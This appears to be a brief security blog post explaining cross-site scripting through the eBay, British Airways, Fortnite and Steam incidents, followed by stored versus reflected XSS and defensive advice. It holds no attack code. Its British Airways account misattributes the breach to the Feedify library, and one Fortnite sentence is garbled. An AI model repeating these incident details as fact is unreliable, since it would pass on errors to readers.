by peter


Cross-Site Scripting Explained


Risk Rating: HIGH
Likelihood: 3/5
Impact: 4/5


  • Lack of Web Application Firewall
  • Poor web application coding
  • Poor server management

Cross-Site Scripting Overview

In late 2015 and early 2016, eBay had a severe Cross-Site Scripting vulnerability. The website used a “url” parameter that redirected users to different pages on the platform, but the value of the parameter was not validated. This allowed attackers to inject malicious code into a page.

The vulnerability enabled attackers to gain full access to eBay seller accounts, sell products at a discount, and steal payment details. It was actively used by attackers to manipulate eBay listings of high value products such as vehicles. eBay eventually remediated the vulnerability, but follow-on attacks continued until 2017.

In 2018, British Airways was attacked by Magecart, a high-profile hacker group famous for credit card skimming attacks. The group exploited an XSS vulnerability in a JavaScript library called Feedify, which was used on the British Airway website.

Attackers modified the script to send customer data to a malicious server, which used a domain name similar to British Airways. The fake server had an SSL certificate, so users believed they were purchasing from a secure server. They succeeded in performing credit card skimming on 380,000 booking transactions before the breach was discovered.

In 2019, the popular multiplayer game experienced an XSS vulnerability that over 200 million users. A retired, unsecured page went unnoticed by Fortnite developers. The page had an XSS vulnerability that allowed attackers to gain unauthorized access to the data of all Fornite users.

Attackers could have used Cross-Site Scripting, in combination with an insecure single sign on (SSO) vulnerability, to redirect users to a fake login page. This would allow them to steal virtual currency within the game, and record player conversations, as reconnaissance for future attacks. Check Point discovered the attack and notified Fortnite, but it is unknown if the vulnerability was exploited by attackers in the interim.

In January of 2019, an XSS vulnerability was discovered in the Steam Chat client operated by Valve, a computer gaming company with more than 90 million active users, any number of whom could have been attacked until the bug was disclosed. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. It’s conceptually like an SQL injection — in which malicious code is entered into a form to gain access to the site’s database — except that in the case of XSS, the malicious code is designed to execute within the browser of another visitor to the site, allowing the attacker to steal user cookies, read session IDs, alter the contents of a website or redirect a user to a malicious site.

What you need to know

XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application generates input from a user without validating or encoding it. The end user’s browser has no way to know that the script should not be trusted, automatically executing on the script. Because it thinks the script came from a trusted source, it can access cookies, session tokens or other sensitive information retained by the browser. These scripts can even rewrite the content of the HTML page.

The best defense against cross-site scripting attacks is to ensure your web application code is written well and to the OWASP standards. Regular web application penetration testing is essential to find those little issues that lead to exploitable vulnerabilities.

Your Security Operations Center should always be on the look out for XSS attacks, especially where a number of attacks are linked together in an attack chain as this can be a sign of a success attack.

How the Cross-Site Scripting attack happens

There are two types of Cross-Site Scripting (XSS) attacks: stored and reflected. Stored XSS attacks occur when an injected script is stored on the server in a fixed location, like a forum post or comment. Every user that lands on the infected page will be affected by the XSS attack. In reflected XSS, the injected script is served to a user as a response to a request, like a search results page.

Attack Sources

While Cross-Site Scripting attacks are not as common as they once were — due primarily to improvements in browsers and security technology — they are still prevalent enough to rank within the top ten threats listed by the Open Web Application Security Project, and the Common Vulnerabilities and Exposures database lists nearly 14,000 vulnerabilities associated with XSS attacks.